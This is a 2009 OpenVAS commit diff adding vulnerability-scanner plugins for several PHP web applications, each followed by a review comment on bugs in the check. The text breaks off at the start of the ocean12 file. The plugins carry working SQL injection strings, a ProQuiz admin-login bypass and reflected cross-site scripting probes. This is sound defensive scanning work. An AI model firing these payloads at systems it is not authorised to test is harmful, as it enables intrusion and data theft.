[Openvas-commits] r2754 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Fri Mar 13 06:42:31 CET 2009
Author: chandra
Date: 2009-03-13 06:42:27 +0100 (Fri, 13 Mar 2009)
New Revision: 2754
Added:
trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl
trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl
trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl
trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl
trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl
trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl
trunk/openvas-plugins/scripts/mambo_detect.nasl
trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl
trunk/openvas-plugins/scripts/phpCommunity2_multiple_remote_input_validation.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added Michael Meyer's plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/ChangeLog 2009-03-13 05:42:27 UTC (rev 2754)
@@ -1,3 +1,15 @@
+2009-03-13 Chandrashekhar B <bchandra at secpod.com>
+ * scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl,
+ scripts/RevSense_sql_injection_and_xss.nasl,
+ scripts/burning_board_3_0_5_input_validation.nasl,
+ scripts/ocean12_sql_injection.nasl,
+ scripts/ProQuiz_sql_injection.nasl,
+ scripts/PHPRecipeBook_sql_injection.nasl,
+ scripts/PHPFusion_book_panel_module_sql_injection.nasl,
+ scripts/mambo_detect.nasl,
+ scripts/phpCommunity2_multiple_remote_input_validation.nasl:
+ Added new plugins from Michael Meyer
+
2009-03-12 Chandrashekhar B <bchandra at secpod.com>
* scripts/gb_php_sql_inj_vuln.nasl,
scripts/secpod_php_imagerotate_info_disc_vuln.nasl,
Added: trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/Chipmunk_guestbook_sql_injection_and_xss.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: Chipmunk_guestbook_sql_injection_and_xss.nasl 116 2009-03-10 17:49:48Z mime $
+#
+# Chipmunk Guestbook Index.PHP SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100039);
+ script_bugtraq_id(18195);
+ script_cve_id("CVE-2008-6368");
+ script_version ("1.0");
+
+ script_name(english:"Chipmunk Guestbook Index.PHP SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ Chipmunk Guestbook is prone to an SQL-injection vulnerability
+ because it fails to properly sanitize user-supplied input before
+ using it in an SQL query.
+
+ A successful exploit could allow an attacker to compromise the
+ application, access or modify data, or exploit vulnerabilities in
+ the underlying database.
+
+ See also;
+ http://www.securityfocus.com/bid/18195
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Chipmunk Guestbook is prone to SQL Injection and Cross Site Scripting");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/guestbook",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/index.php?start=<script>alert(document.cookie)</script>");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+ if (
+ egrep(pattern:".*You have an error in your SQL syntax.*", string: buf) &&
+ egrep(pattern:".*<script>alert\(document.cookie\)</script>.*", string: buf)
+ )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
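Review bot: The detection at `if ( egrep(pattern:".*You have an error in your SQL syntax.*", ...) && egrep(pattern:".*<script>alert\(document.cookie\)</script>.*", ...) )` requires both indicators from one probe, so a host that reflects the script but no longer leaks the MySQL error text (or the reverse) is reported clean, while `script_summary` advertises both SQL injection and XSS and `script_name`/`desc` mention only SQL injection. Either evaluate the two indicators separately or state in the description that only the combined signature is checked. The error string is MySQL-specific, which the description could also note. `See also;` in the description should read `See also:`; the same typo appears in the RevSense and burning_board descriptions in this commit.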
Added: trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/PHPFusion_book_panel_module_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: PHPFusion_book_panel_module_sql_injection.nasl 121 2009-03-12 13:58:23Z mime $
+#
+# PHP-Fusion Book Panel Module 'books.php' SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100043);
+ script_bugtraq_id(34049);
+ script_version ("1.0");
+
+ script_name(english:"PHP-Fusion Book Panel Module 'books.php' SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ The Book Panel module for PHP-Fusion is prone to an SQL-injection
+ vulnerability because it fails to sufficiently sanitize
+ user-supplied data before using it in an SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ See also:
+ http://www.securityfocus.com/bid/34049
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"PHP-Fusion Book Panel Module 'books.php' SQL Injection Vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dir = make_list("/infusions", cgi_dirs());
+foreach d (dir)
+{
+ url = string(d, "/book_panel/books.php?&bookid=-1+union+select+1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6--");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "OpenVAS-SQL-Injection-Test", string: buf)
+ )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+exit(0);
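Review bot: The request path at `url = string(d, "/book_panel/books.php?&bookid=-1+union+...")` has a stray `&` directly after `?`, producing an empty first parameter; `"/book_panel/books.php?bookid=..."` is the intended form. `bodyonly:1` here (and in PHPRecipeBook and ocean12) mixes with `bodyonly:FALSE`/`bodyonly:TRUE` in the sibling scripts; one spelling would be easier to grep. Unlike ProQuiz and ocean12, no presence check precedes the request, so the UNION payload is sent to every directory in `cgi_dirs()`; a plain `books.php?bookid=1` request first would confine the test to hosts that actually serve the module and reduce scanner noise.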
Added: trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/PHPRecipeBook_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: PHPRecipeBook_sql_injection.nasl 120 2009-03-12 13:36:43Z mime $
+#
+# PHPRecipeBook 'base_id' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100042);
+ script_bugtraq_id(34052);
+ script_version ("1.0");
+
+ script_name(english:"PHPRecipeBook 'base_id' Parameter SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ PHPRecipeBook is prone to an SQL-injection vulnerability because it
+ fails to sufficiently sanitize user-supplied data before using it in
+ an SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ PHPRecipeBook 2.24 is vulnerable; other versions may also be affected.
+
+ See also:
+ http://www.securityfocus.com/bid/34052
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if PHPRecipeBook is vulnerable to SQL Injection.");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dir = make_list("/phprecipebook","/recipebook","recipe", cgi_dirs());
+foreach d (dir)
+{
+ url = string(d, "/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "OpenVAS-SQL-Injection-Test", string: buf)
+ )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+exit(0);
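Review bot: In `dir = make_list("/phprecipebook","/recipebook","recipe", cgi_dirs());` the third entry has no leading slash, so the request line becomes `GET recipe/index.php?...`, which is not a valid absolute path and can never match an installation; it should be `"/recipe"`. The marker only appears if the hard-coded table `security_users` exists on the target, so installations with a different schema are presumably reported clean; a sentence in the description naming that assumption would help whoever tunes false negatives later.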
Added: trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/ProQuiz_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: ProQuiz_sql_injection.nasl 117 2009-03-10 18:21:01Z mime $
+#
+# ProQuiz 'Username' and 'Password' Parameters SQL Injection
+# Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100040);
+ script_bugtraq_id(32724);
+ script_cve_id("CVE-2008-6312","CVE-2008-6327");
+ script_version ("1.0");
+
+ script_name(english:"ProQuiz 'Username' and 'Password' Parameters SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ ProQuiz is prone to an SQL-injection vulnerability because it fails
+ to sufficiently sanitize user-supplied data before using it in an
+ SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ ProQuiz 1.0 is vulnerable; other versions may also be affected.
+
+ See also:
+ http://www.securityfocus.com/bid/32724
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if ProQuiz is vulnerable to SQL Injection");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/proquiz",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/admin/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
+ if( buf == NULL )continue;
+
+ if( egrep(pattern: "This is the Admin Panel of TRDC.IN", string: buf) ) {
+
+ variables = string("username=' or 1=1#&password=x");
+ filename = string(dir + "/admin/index.php");
+ host=get_host_name();
+
+ req = string(
+ "POST ", filename, " HTTP/1.0\r\n",
+ "Referer: ","http://", host, filename, "\r\n",
+ "Host: ", host, ":", port, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(variables),
+ "\r\n\r\n",
+ variables
+ );
+
+ result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+ if(egrep(pattern: "Location: admin.php", string: result)) {
+ security_warning(port);
+ exit(0);
+ }
+ }
+}
+
+exit(0);
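Review bot: The success indicator `egrep(pattern: "Location: admin.php", string: result)` is unanchored, runs over headers and body (`bodyonly:FALSE`) and leaves the `.` unescaped, so any occurrence of that text, including a panel that redirects every POST to admin.php regardless of credentials, yields a finding; `^Location: admin\.php` is tighter, and confirming that a POST with an ordinary wrong password does not redirect would verify the bypass rather than the redirect. `security_warning(port);` here, and at the same spot in ocean12, passes the port positionally while every other script in this commit writes `security_warning(port:port);`. `filename = string(dir + "/admin/index.php");` mixes `+` concatenation inside `string()`; `string(dir, "/admin/index.php")` matches the line above it. Since the check attempts an actual administrator login, `ACT_GATHER_INFO` is arguably the wrong category for it and for the equivalent ocean12 check.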
Added: trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/RevSense_sql_injection_and_xss.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: RevSense_sql_injection_and_xss.nasl 116 2009-03-10 17:49:48Z mime $
+#
+# RevSense SQL Injection and Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100038);
+ script_bugtraq_id(32624);
+ script_cve_id("CVE-2008-6385");
+ script_version ("1.0");
+
+ script_name(english:"RevSense SQL Injection and Cross Site Scripting Vulnerabilities");
+ desc["english"] = "
+
+ Overview:
+ RevSense is prone to an SQL-injection vulnerability and a cross-site
+ scripting vulnerability because it fails to sufficiently sanitize
+ user-supplied data.
+
+ Exploiting these issues could allow an attacker to steal
+ cookie-based authentication credentials, compromise the application,
+ access or modify data, or exploit latent vulnerabilities in the
+ underlying database.
+
+ RevSense 1.0 is vulnerable; other versions may also be affected.
+
+ See also;
+ http://www.securityfocus.com/bid/32624
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if RevSense is prone to SQL Injection and Cross Site Scripting");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/revsense",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/index.php?section=<script>alert(document.cookie)</script>&action=login");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if (
+ egrep(pattern:".*AdRevenue Error: \[ <script>alert\(document.cookie\)</script> \] not found.*", string: buf)
+ )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
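Review bot: The only indicator, `egrep(pattern:".*AdRevenue Error: \[ <script>alert\(document.cookie\)</script> \] not found.*", ...)`, confirms the reflected cross-site scripting issue but never exercises the SQL injection that `script_name`, `desc` and `script_summary` all advertise; the description should say that the SQL-injection part is not tested, or a second probe should be added. Matching on the exact `AdRevenue Error: [ ... ] not found` template also ties the check to one error page wording, so a localised or restyled error page is presumably missed; a comment noting that limitation would help maintainers.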
Added: trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl
===================================================================
--- trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/burning_board_3_0_5_input_validation.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: burning_board_3_0_5_input_validation.nasl 118 2009-03-10 18:37:06Z mime $
+#
+# Woltlab Burning Board Multiple Input Validation Vulnerabilites
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100041);
+ script_bugtraq_id(34057);
+ script_version ("1.0");
+
+ script_name(english:"Woltlab Burning Board Multiple Input Validation Vulnerabilites");
+ desc["english"] = "
+
+ Overview:
+
+ Woltlab Burning Board is prone to multiple input-validation vulnerabilities, including:
+
+ - Multiple security that may allow attackers to delete private messages
+ - A cross-site scripting vulnerability
+ - Multiple URI redirection vulnerabilities
+
+ Attackers can exploit these issues to delete private messages,
+ execute arbitrary script code, steal cookie-based authentication
+ credentials and redirect users to malicious sites.
+
+ Vulnerable:
+ Woltlab Burning Board 3.0.5
+ Woltlab Burning Board 3.0.3 PL 1
+ Woltlab Burning Board 3.0
+
+ See also;
+ http://www.securityfocus.com/bid/34057
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Woltlab Burning Board is prone to Multiple Input Validation Vulnerabilites");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/forum","/board",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, "/wcf/acp/dereferrer.php?url=javascript:alert(document.cookie);");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if (egrep(pattern:".*<a href=.javascript:alert\(document.cookie\);.>javascript:alert\(document.cookie\);</a>.*", string: buf)
+ )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
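Review bot: `script_id(100041);` is also used by phpCommunity2_multiple_remote_input_validation.nasl in this same commit, so the two plugins collide on the scanner's plugin ID and one of them must be given an unused ID before this is merged. The description line `- Multiple security that may allow attackers to delete private messages` is missing a noun (presumably `Multiple security-bypass issues ...`), and `Vulnerabilites` in the `$Id` header, `script_name` and `script_summary` should be `Vulnerabilities`. The probe against `/wcf/acp/dereferrer.php` only verifies the reflection/redirect item; the description could note that the private-message deletion issue is not tested.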
Added: trunk/openvas-plugins/scripts/mambo_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/mambo_detect.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/mambo_detect.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,195 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: mambo_detect.nasl 113 2009-03-09 17:33:16Z mime $
+#
+# mambo Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc["english"] = "
+
+ Overview:
+ This host is running mambo a widely installed Open Source cms solution.
+
+ See also:
+ http://www.mamboserver.com
+
+ Risk factor : None";
+
+if (description)
+{
+ script_id(100036);
+ script_version ("1.0");
+
+ script_name(english:"mambo Detection");
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Checks for the presence of mambo");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"General");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dirs = make_list("/mambo","/cms",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "^Set-Cookie: mosvisitor=1", string: buf) ||
+ egrep(pattern: '.*meta name="description" content="This site uses Mambo.*', string: buf) ||
+ egrep(pattern: '.*meta name="Generator" content="Mambo.*', string: buf) ||
+ egrep(pattern: '.*http://mambo-foundation.org<[^>]+>Mambo.*', string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ } else {
+
+ url = string(dir, "/htaccess.txt");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: ".*# @package Mambo.*", string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ } else {
+
+ url = string(dir, "/README.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: "^Mambo is Open Source software.*", string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ } else {
+
+ url = string(dir, "/includes/js/mambojavascript.js");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(
+ egrep(pattern: ".*@package Mambo.*", string: buf)
+ )
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ }
+
+ }
+ }
+
+ }
+
+ if(install) {
+
+ vers = string("unknown");
+ #try to get version
+
+ url = string(dir, "/administrator/components/com_admin/version.xml");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ version = eregmatch(string: buf, pattern: "<version>(.*)</version>");
+
+ if ( !isnull(version[1]) ) {
+ vers=version[1];
+ } else {
+
+ url = string(dir, "/mambots/content/moscode.xml");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ version = eregmatch(string: buf, pattern: ".*<version>(.*)</version>.*");
+
+ if ( !isnull(version[1]) ) {
+ vers=version[1];
+ } else {
+
+ url = string(dir, "/help/mambo.whatsnew.html");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ version = eregmatch(string: buf, pattern: ".*<h1>.*New in Version (.*)</h1>.*");
+
+ if ( !isnull(version[1]) ) {
+ vers=version[1];
+ }
+ }
+
+ }
+
+ set_kb_item(name: string("www/", port, "/mambo_mos"), value: string(vers," under ",install));
+ info = string("None\n\nmambo Version (");
+ info += string(vers);
+ info += string(") was detected on the remote host in the following directory(s):\n\n");
+ info += string(install, "\n");
+
+ desc = ereg_replace(
+ string:desc["english"],
+ pattern:"None$",
+ replace:info
+ );
+
+ security_note(port:port,data:desc);
+ exit(0);
+ }
+}
+exit(0);
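Review bot: The version captures at `version = eregmatch(string: buf, pattern: "<version>(.*)</version>");` and the two following `eregmatch` calls use an unbounded greedy `(.*)`, so whatever the target returns between the first `<version>` and the last `</version>`, potentially most of the document, flows unchanged into `set_kb_item(...)` and the `security_note` report text; `<version>([^<]+)</version>` (and `New in Version ([^<]+)</h1>`) limits the capture to the element content and keeps target-controlled markup out of the report. The three version probes also skip the `if( buf == NULL )` guard that every detection probe has, so `eregmatch` runs on a NULL `buf`. `install` is never initialised, so `if(install)` relies on an undefined variable evaluating false; `install = NULL;` at the top of the loop body makes the intent explicit. The four nested detection branches repeat the same `if(strlen(dir)>0)` block; a single loop over (path, pattern) pairs would be easier to extend, and the report wording `directory(s)` overstates what is reported, since the script exits on the first hit.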
Added: trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl 2009-03-12 19:21:48 UTC (rev 2753)
+++ trunk/openvas-plugins/scripts/ocean12_sql_injection.nasl 2009-03-13 05:42:27 UTC (rev 2754)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: ocean12_sql_injection.nasl 114 2009-03-10 11:41:37Z mime $
+#
+# Ocean12 Membership Manager Pro 'login.asp' SQL Injection
